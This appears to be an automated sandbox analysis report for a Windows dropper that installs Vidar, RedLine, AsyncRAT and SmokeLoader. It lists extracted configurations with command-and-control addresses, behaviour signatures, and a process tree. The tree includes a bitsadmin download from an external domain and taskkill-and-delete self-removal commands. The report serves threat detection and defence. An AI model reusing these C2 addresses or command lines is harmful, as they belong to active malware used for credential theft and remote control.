Analysis

  • max time kernel
    13s
  • max time network
    157s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-07-2021 18:05

General

  • Target

    b138c67994648f1784c8263e0af703662e2bd8e55d9d8a1189dcf243f2bff657.exe

  • Size

    3.7MB

  • MD5

    f487f870fdf6550c4ca3241481fd49dc

  • SHA1

    f5f4a37e432c551b67508a74861e2f6e70ec2d4d

  • SHA256

    b138c67994648f1784c8263e0af703662e2bd8e55d9d8a1189dcf243f2bff657

  • SHA512

    6e5d57fdbe36492955df7b50ab40b7a1466cd225126eabbd36cebbdb1696e7bd560e1728cf2b697861b5c59be58bab6f1f4f868c00ef32b38e4fa4d84fb3bb6f

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

Cana

C2

176.111.174.254:56328

Extracted

Family

asyncrat

Version

0.5.7B

C2

null:null

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    3htbU7p8VLsbVqyiXfg3CvefpcBeyVlh

  • anti_detection

    true

  • autorun

    true

  • bdos

    false

  • delay

    Default

  • host

    null

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    https://pastebin.com/raw/xV7ZAURy

  • port

    null

  • version

    0.5.7B

aes.plain

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Async RAT payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 21 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 11 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies registry class 9 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:296
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2980
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2568
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2548
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1128
            • C:\Users\Admin\AppData\Local\Temp\b138c67994648f1784c8263e0af703662e2bd8e55d9d8a1189dcf243f2bff657.exe
              "C:\Users\Admin\AppData\Local\Temp\b138c67994648f1784c8263e0af703662e2bd8e55d9d8a1189dcf243f2bff657.exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:808
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3632
                • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS03E24084\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:3956
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2816
                    • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_1.exe
                      sonia_1.exe
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Modifies registry class
                      PID:3900
                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
                        6⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4332
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3388
                    • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_2.exe
                      sonia_2.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2292
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2864
                    • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_3.exe
                      sonia_3.exe
                      5⤵
                      • Executes dropped EXE
                      PID:2560
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1444
                        6⤵
                        • Program crash
                        PID:1364
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1316
                    • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_4.exe
                      sonia_4.exe
                      5⤵
                      • Executes dropped EXE
                      PID:2296
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        6⤵
                        • Executes dropped EXE
                        PID:1896
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        6⤵
                          PID:4164
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3508
                      • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_5.exe
                        sonia_5.exe
                        5⤵
                        • Executes dropped EXE
                        PID:3916
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2176
                      • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_6.exe
                        sonia_6.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2260
                        • C:\Users\Admin\AppData\Roaming\3659769.exe
                          "C:\Users\Admin\AppData\Roaming\3659769.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3456
                        • C:\Users\Admin\AppData\Roaming\3380837.exe
                          "C:\Users\Admin\AppData\Roaming\3380837.exe"
                          6⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:4116
                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                            7⤵
                              PID:1464
                          • C:\Users\Admin\AppData\Roaming\6669988.exe
                            "C:\Users\Admin\AppData\Roaming\6669988.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4192
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2232
                        • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_7.exe
                          sonia_7.exe
                          5⤵
                          • Executes dropped EXE
                          PID:1452
                          • C:\Users\Admin\Documents\luL7bkIuQRyU9VkZzCM_x4Yv.exe
                            "C:\Users\Admin\Documents\luL7bkIuQRyU9VkZzCM_x4Yv.exe"
                            6⤵
                              PID:5068
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                7⤵
                                  PID:6052
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                    8⤵
                                      PID:4984
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.0.1914338610\1660368812" -parentBuildID 20200403170909 -prefsHandle 1412 -prefMapHandle 1404 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 1488 gpu
                                        9⤵
                                          PID:5820
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.3.1443120185\510964850" -childID 1 -isForBrowser -prefsHandle 2168 -prefMapHandle 2164 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 2148 tab
                                          9⤵
                                            PID:5904
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.13.1647541344\2065306123" -childID 2 -isForBrowser -prefsHandle 2784 -prefMapHandle 3020 -prefsLen 7013 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 2892 tab
                                            9⤵
                                              PID:6516
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4984.20.1046685129\1669018194" -childID 3 -isForBrowser -prefsHandle 4164 -prefMapHandle 4200 -prefsLen 8017 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4984 "\\.\pipe\gecko-crash-server-pipe.4984" 4184 tab
                                              9⤵
                                                PID:6160
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                            7⤵
                                              PID:6748
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff90afd4f50,0x7ff90afd4f60,0x7ff90afd4f70
                                                8⤵
                                                  PID:6712
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 /prefetch:8
                                                  8⤵
                                                    PID:7732
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:8
                                                    8⤵
                                                      PID:7720
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:2
                                                      8⤵
                                                        PID:7712
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                        8⤵
                                                          PID:7636
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:1
                                                          8⤵
                                                            PID:7556
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
                                                            8⤵
                                                              PID:6220
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
                                                              8⤵
                                                                PID:7936
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
                                                                8⤵
                                                                  PID:8068
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                                                                  8⤵
                                                                    PID:8088
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:8
                                                                    8⤵
                                                                      PID:8736
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,3702826865632113671,13589192985062892846,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1892 /prefetch:8
                                                                      8⤵
                                                                        PID:9156
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /C taskkill /F /PID 5068 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\luL7bkIuQRyU9VkZzCM_x4Yv.exe"
                                                                      7⤵
                                                                        PID:7476
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /F /PID 5068
                                                                          8⤵
                                                                          • Kills process with taskkill
                                                                          PID:7928
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /C taskkill /F /PID 5068 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\luL7bkIuQRyU9VkZzCM_x4Yv.exe"
                                                                        7⤵
                                                                          PID:7468
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /F /PID 5068
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:7920
                                                                      • C:\Users\Admin\Documents\MNZh7RcTZ_A_tA1H_Z7v8iY2.exe
                                                                        "C:\Users\Admin\Documents\MNZh7RcTZ_A_tA1H_Z7v8iY2.exe"
                                                                        6⤵
                                                                          PID:4724
                                                                          • C:\Users\Admin\Documents\MNZh7RcTZ_A_tA1H_Z7v8iY2.exe
                                                                            C:\Users\Admin\Documents\MNZh7RcTZ_A_tA1H_Z7v8iY2.exe
                                                                            7⤵
                                                                              PID:4292
                                                                            • C:\Users\Admin\Documents\MNZh7RcTZ_A_tA1H_Z7v8iY2.exe
                                                                              C:\Users\Admin\Documents\MNZh7RcTZ_A_tA1H_Z7v8iY2.exe
                                                                              7⤵
                                                                                PID:616
                                                                            • C:\Users\Admin\Documents\xvQkY3dgB8ZWrg9_pdG6P8nU.exe
                                                                              "C:\Users\Admin\Documents\xvQkY3dgB8ZWrg9_pdG6P8nU.exe"
                                                                              6⤵
                                                                                PID:4812
                                                                                • C:\Users\Admin\Documents\xvQkY3dgB8ZWrg9_pdG6P8nU.exe
                                                                                  C:\Users\Admin\Documents\xvQkY3dgB8ZWrg9_pdG6P8nU.exe
                                                                                  7⤵
                                                                                    PID:4396
                                                                                • C:\Users\Admin\Documents\0l9BGKGsW6DRXoT994F8e8DQ.exe
                                                                                  "C:\Users\Admin\Documents\0l9BGKGsW6DRXoT994F8e8DQ.exe"
                                                                                  6⤵
                                                                                    PID:1272
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "0l9BGKGsW6DRXoT994F8e8DQ.exe" /f & erase "C:\Users\Admin\Documents\0l9BGKGsW6DRXoT994F8e8DQ.exe" & exit
                                                                                      7⤵
                                                                                        PID:6128
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im "0l9BGKGsW6DRXoT994F8e8DQ.exe" /f
                                                                                          8⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:1176
                                                                                    • C:\Users\Admin\Documents\MQIErXhjoaBdxfG6i3U3L7fb.exe
                                                                                      "C:\Users\Admin\Documents\MQIErXhjoaBdxfG6i3U3L7fb.exe"
                                                                                      6⤵
                                                                                        PID:3772
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          7⤵
                                                                                            PID:5780
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5876
                                                                                        • C:\Users\Admin\Documents\l9q73H0XEd8nwDNiEXF3wuX3.exe
                                                                                          "C:\Users\Admin\Documents\l9q73H0XEd8nwDNiEXF3wuX3.exe"
                                                                                          6⤵
                                                                                            PID:4264
                                                                                            • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                              7⤵
                                                                                                PID:5148
                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                7⤵
                                                                                                  PID:5188
                                                                                                • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                  7⤵
                                                                                                    PID:5180
                                                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                      8⤵
                                                                                                        PID:6016
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                      7⤵
                                                                                                        PID:5164
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                            PID:5912
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                              PID:6112
                                                                                                        • C:\Users\Admin\Documents\PbxFJJyUPlO0OiatcVJQZZ0G.exe
                                                                                                          "C:\Users\Admin\Documents\PbxFJJyUPlO0OiatcVJQZZ0G.exe"
                                                                                                          6⤵
                                                                                                            PID:3632
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im PbxFJJyUPlO0OiatcVJQZZ0G.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PbxFJJyUPlO0OiatcVJQZZ0G.exe" & del C:\ProgramData\*.dll & exit
                                                                                                              7⤵
                                                                                                                PID:4352
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im PbxFJJyUPlO0OiatcVJQZZ0G.exe /f
                                                                                                                  8⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5544
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 6
                                                                                                                  8⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:5788
                                                                                                            • C:\Users\Admin\Documents\RqNSqi7OKmkSF3VGdT_ByFLf.exe
                                                                                                              "C:\Users\Admin\Documents\RqNSqi7OKmkSF3VGdT_ByFLf.exe"
                                                                                                              6⤵
                                                                                                                PID:4344
                                                                                                                • C:\Users\Admin\Documents\RqNSqi7OKmkSF3VGdT_ByFLf.exe
                                                                                                                  C:\Users\Admin\Documents\RqNSqi7OKmkSF3VGdT_ByFLf.exe
                                                                                                                  7⤵
                                                                                                                    PID:3548
                                                                                                                • C:\Users\Admin\Documents\ZPs_9XbJxH1AQa1bgCVQi_gH.exe
                                                                                                                  "C:\Users\Admin\Documents\ZPs_9XbJxH1AQa1bgCVQi_gH.exe"
                                                                                                                  6⤵
                                                                                                                    PID:4532
                                                                                                                    • C:\Users\Admin\Documents\ZPs_9XbJxH1AQa1bgCVQi_gH.exe
                                                                                                                      "C:\Users\Admin\Documents\ZPs_9XbJxH1AQa1bgCVQi_gH.exe"
                                                                                                                      7⤵
                                                                                                                        PID:2476
                                                                                                                    • C:\Users\Admin\Documents\iuIjlhbpCv0C1gdNZ50kcko6.exe
                                                                                                                      "C:\Users\Admin\Documents\iuIjlhbpCv0C1gdNZ50kcko6.exe"
                                                                                                                      6⤵
                                                                                                                        PID:4508
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                          7⤵
                                                                                                                            PID:3568
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                            7⤵
                                                                                                                              PID:6724
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:6392
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                                7⤵
                                                                                                                                  PID:6780
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:6488
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:7296
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7080.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:9136
                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                                                        7⤵
                                                                                                                                        • Download via BitsAdmin
                                                                                                                                        PID:8852
                                                                                                                                    • C:\Users\Admin\Documents\SDBXpUEY2xrIHoKKmj3KQ42u.exe
                                                                                                                                      "C:\Users\Admin\Documents\SDBXpUEY2xrIHoKKmj3KQ42u.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:4928
                                                                                                                                      • C:\Users\Admin\Documents\vZFdj1E4FYl91T6SZA7x60bB.exe
                                                                                                                                        "C:\Users\Admin\Documents\vZFdj1E4FYl91T6SZA7x60bB.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:2880
                                                                                                                                        • C:\Users\Admin\Documents\vY49e9bueBadi4MZdfITjFeb.exe
                                                                                                                                          "C:\Users\Admin\Documents\vY49e9bueBadi4MZdfITjFeb.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:4164
                                                                                                                                            • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                              "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:5392
                                                                                                                                                • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                  "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6992
                                                                                                                                                • C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                                  "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5460
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 2260
                                                                                                                                                      8⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4616
                                                                                                                                                • C:\Users\Admin\Documents\U6J37Be6VHYhc7gwhihBcv8l.exe
                                                                                                                                                  "C:\Users\Admin\Documents\U6J37Be6VHYhc7gwhihBcv8l.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:3920
                                                                                                                                                    • C:\Users\Admin\Documents\U6J37Be6VHYhc7gwhihBcv8l.exe
                                                                                                                                                      "C:\Users\Admin\Documents\U6J37Be6VHYhc7gwhihBcv8l.exe" -a
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5592
                                                                                                                                                    • C:\Users\Admin\Documents\SpWU8iFmpS_WsCEDKsLhudKO.exe
                                                                                                                                                      "C:\Users\Admin\Documents\SpWU8iFmpS_WsCEDKsLhudKO.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4256
